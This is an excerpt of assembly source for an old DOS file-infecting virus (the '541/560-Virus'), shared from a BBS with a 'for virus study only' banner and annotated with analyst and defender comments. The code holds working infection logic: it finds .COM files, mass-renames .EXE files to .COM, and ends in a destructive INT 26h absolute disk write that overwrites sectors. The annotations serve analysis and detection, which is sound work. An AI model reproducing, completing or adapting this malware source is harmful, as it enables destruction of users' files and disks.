📄 560.asm
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
PAGE 70,120
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 Name Virus: 541-Virus 14 Sept 1990 圹
;;圹 Suggested Alias: NOP-Virus 圹
;;圹 Variant: 537-Virus, 560-Virus 圹
;;圹 圹
;;圹 Last Reported: September 1990 圹
;;圹 'Isolated': The Hague, The Netherlands 圹
;;圹 by: Righard Zwienenberg 2:512/2.3@fidonet 圹
;;圹 圹
;;圹 Author: Ralf Burger in 1986 for his book: 圹
;;圹 VIRUSES, A HIGH TECHNICAL DISEASE 圹
;;圹 圹
;;圹 圹
;;圹 The code of this virus was built into a MOVE-util. It was imple- 圹
;;圹 mented wrong. The virus went straight to the destruction code. 圹
;;圹 I've taken the code out and reconstructed it to its original 圹
;;圹 form. Because I had a listing of Ralf Burger's book I have placed 圹
;;圹 his own comments behind the code, although I've translated it into 圹
;;圹 English. The labels used, are also his. 圹
;;圹 圹
;;圹 I've put three comments myself in the code. These can be recog- 圹
;;圹 nized by the starting ;; of it. 圹
;;圹 圹
;;圹 Edwin Cleton, who sent me the MOVE util for examination, 圹
;;圹 downloaded it from a BBS. So far there are no damage reports. 圹
;;圹 The move-util checked the system's date. If the date is 1 Aug 圹
;;圹 or later of any year, the virus was called. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 This sourcelisting can be recompiled with MASM 4.0+ and A86. For 圹
;;圹 compilation with A86 you must specify 'conta' and 'disks' as a word 圹
;;圹 else the definition will conflict with what A86 previously thinks. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
;;圹 圹
;;圹 Virus-Description: 圹
;;圹 ------------------ 圹
;;圹 圹
;;圹 The virus infects the first COM-file in the ROOT-Directory. The 圹
;;圹 virus overwrites the first 230h bytes of the file. When an infected 圹
;;圹 file is executed it will infect one other .COM-file. The system will 圹
;;圹 crash mostly afterwards because the overwritten part is not stored. 圹
;;圹 When COMMAND.COM is infected on the HDU, the system will not reboot 圹
;;圹 because COMMAND.COM is complete. Each reboot COMMAND.COM will infect 圹
;;圹 one other .COM-File and the computer crashes. When all .COM-files 圹
;;圹 are infected, .EXE-files will be renamed (FCB) to .COM to become 圹
;;圹 infected. When all .COM and .EXE-files are infected, the virus will 圹
;;圹 write to sectors on disk depending on the system's time. 圹
;;圹 The infected files are lost and must be replaced by backup-copies. 圹
;;圹 圹
;;圹 The shortest size an infected file can be is 230h bytes. The code is 圹
;;圹 shorter, but this is the value which has been put into the code as 圹
;;圹 the virus-length. 圹
;;圹 圹
;;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹
Code Segment
Assume CS:Code
progr equ 100h
org progr
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; The three NOPs are set as an identifier for the virus. This way
; the virus knows that a file carrying them is already infected.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
;-----------------------------------------------------------------------
; MAIN - entry point (org 100h, DOS .COM layout per the 'progr equ 100h'
; above). Analyst summary of this run:
;   1. three NOP bytes (opcode 90h) that the listing's own comments
;      describe as the infection marker,
;   2. zero the work variables,
;   3. record the current drive and current directory,
;   4. compute the start value of 'pointer' inside 'search_order',
;   5. clear CF and fall through into change_disk.
; 'pointer', 'counter', 'disks', 'drive', 'old_path' and 'search_order'
; are defined outside this excerpt; their sizes/layout are not visible
; here.
; Triage note: three leading 90h bytes are a weak indicator on their
; own; treat them as a hint, not as a signature.
;-----------------------------------------------------------------------
MAIN:
nop
nop
nop
;-----------------------------------------------------------------------
; Init the pointers
;-----------------------------------------------------------------------
mov ax,0
mov es:[pointer],ax                     ; written via ES here, read via CS below - presumably ES = CS as in a .COM program; confirm
mov es:[counter],ax
mov es:[disks],al
;-----------------------------------------------------------------------
; Get current disk drive
;-----------------------------------------------------------------------
mov ah,19h ; INT 21h/19h: get current default drive -> AL (0 = A:)
int 21h
;-----------------------------------------------------------------------
; Get current path
;-----------------------------------------------------------------------
mov cs:drive,al ; remember the drive that was current at start
mov ah,47h ; INT 21h/47h: get current directory
mov dh,0
add al,1                                ; 47h numbers drives from 1 (0 = default), 19h from 0
mov dl,al ; DL = drive whose current directory is queried
lea si,cs:old_path                      ; SI = buffer that receives the path
int 21h
;-----------------------------------------------------------------------
; Query the number of drives. The original comment says that with a
; single drive the pointer is moved to 'search_order + 6'.
; NOTE(review): as listed, AL is reloaded with 1 right before the
; compare, so the value returned by INT 21h/0Eh is not what is tested;
; the jne below is never taken and AL is always set to 6.
;-----------------------------------------------------------------------
mov ah,0Eh ; INT 21h/0Eh: select default drive, returns drive count in AL
mov dl,0                                ; drive 0 (A:) is passed as the drive to select
int 21h
mov al,1
cmp al,1 ; one drive?
jne hups3
mov al,6
hups3:
mov ah,0                                ; AX = AL, zero-extended
lea bx,cs:search_order
add bx,ax
add bx,1                                ; one past the entry: no_name_change decrements before it reads
mov cs:pointer,bx
clc                                     ; CF clear so the first pass through change_disk skips the rename
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; The carry-flag is set if the search finds no more .COM-files. To do
; it the easy way, all .EXE-files get the .COM-extension so they can be
; infected. This will result in an error if the executed .EXE is too big.
; The error-message 'Program too big to fit in memory' will be the result.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
;-----------------------------------------------------------------------
; change_disk - reached by fall-through from MAIN (CF cleared there) and
; by 'jc change_disk' from find_first_subdir (CF set: search failed).
;   CF clear          -> no_name_change (pick the next drive entry)
;   CF set            -> FCB rename using 'mask_exe' (defined outside
;                        this excerpt; per the listing's comments it
;                        turns .EXE names into .COM)
;   rename AL <> 0FFh -> no_name_change
;   rename AL =  0FFh -> falls into the destructive payload below
; Defender notes: the payload is an INT 26h absolute disk write, which
; bypasses the file system, so the result is raw sector corruption and
; not a changed file; the listing's description states that affected
; data has to be restored from backup. Mass .EXE -> .COM renames in a
; directory are the earlier, visible symptom.
;-----------------------------------------------------------------------
change_disk:
jnc no_name_change
mov ah,17h ; INT 21h/17h: rename file via FCB
lea dx,cs:mask_exe
int 21h
cmp al,0FFh                             ; 17h returns AL = 0FFh when the rename failed
jnz no_name_change ; rename succeeded -> keep going with the next drive
;-----------------------------------------------------------------------
; Per the original comments: no .COM or .EXE files are left, so sectors
; are overwritten at a position taken from the system time. At this
; point the virus cannot infect anything more and starts the destruction.
;-----------------------------------------------------------------------
mov ah,2Ch ; INT 21h/2Ch: get system time, DH = seconds, DL = hundredths
int 21h
mov bx,cs:pointer
mov al,cs:[bx]                          ; AL = byte at 'pointer', used as the INT 26h drive number
mov bx,dx                               ; BX = the time value, used as the offset of the data to write
mov cx,2                                ; two sectors
mov dh,0                                ; DX = hundredths only, used as the first sector number
int 26h ; absolute disk write: AL = drive, CX = count, DX = first sector, DS:BX = data
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Test if the end of the seek-procedure or of the table has been reached.
; If so: end.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
;-----------------------------------------------------------------------
; no_name_change - step 'pointer' back by one byte and read the byte it
; now addresses. 0FFh ends the walk (jump to 'hops', which is outside
; this excerpt); any other value is left in DL for hups2.
; 'search_order' itself is not visible here - presumably a byte table
; of drive numbers with 0FFh markers; confirm against its definition.
;-----------------------------------------------------------------------
no_name_change:
mov bx,cs:pointer
dec bx                                  ; pre-decrement: MAIN stored the address one past the first entry
mov cs:pointer,bx
mov dl,cs:[bx]                          ; DL = current table entry
cmp dl,0FFh                             ; end marker?
jnz hups2
jmp hops
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Get new disk from the list with search orders and make it the actual one.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
;-----------------------------------------------------------------------
; hups2 - make the drive in DL (loaded in no_name_change) the default
; drive, change directory to 'path', then continue at find_first_file.
; 'path' and 'find_first_file' are outside this excerpt; the original
; comment says 'path' is the ROOT directory.
; The return values of both DOS calls are not checked here.
;-----------------------------------------------------------------------
hups2:
mov ah,0Eh                              ; INT 21h/0Eh: select default drive, DL = drive
int 21h ; change disk
;-----------------------------------------------------------------------
; Start at the ROOT-Directory.
;-----------------------------------------------------------------------
mov ah,3Bh ; INT 21h/3Bh: change current directory
lea dx,cs:path
int 21h
jmp find_first_file
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
; Starting from the ROOT-dir, search for the first sub-dir. Before that,
; change all .EXE-files into .COM-files in the old directory.
;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
;-----------------------------------------------------------------------
; find_first_subdir - three DOS calls in sequence, then a test of
; 'counter':
;   1. FCB rename using 'mask_exe' in the directory that is current on
;      entry (result not checked),
;   2. change directory to 'path',
;   3. find-first with attribute mask 11h and the pattern 'mask_dir'.
; CF set after the search -> change_disk, which takes its rename /
; payload path because CF is still set on arrival.
; 'mask_exe', 'path', 'mask_dir', 'counter' and 'use_next_subdir' are
; defined outside this excerpt.
;-----------------------------------------------------------------------
find_first_subdir:
mov ah,17h ; INT 21h/17h: rename file via FCB
lea dx,cs:mask_exe
int 21h
mov ah,3Bh ; INT 21h/3Bh: change current directory to 'path'
lea dx,cs:path
int 21h
mov ah,4Eh ; INT 21h/4Eh: find first matching entry
mov cx,11h ; attribute mask: 10h = directory, 01h = read-only
lea dx,cs:mask_dir
int 21h
jc change_disk                          ; nothing matched
mov bx,cs:counter
inc bx                                  ; inc/dec pair leaves BX unchanged ...
dec bx                                  ; ... and sets ZF when counter is 0
jz use_next_subdir
;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌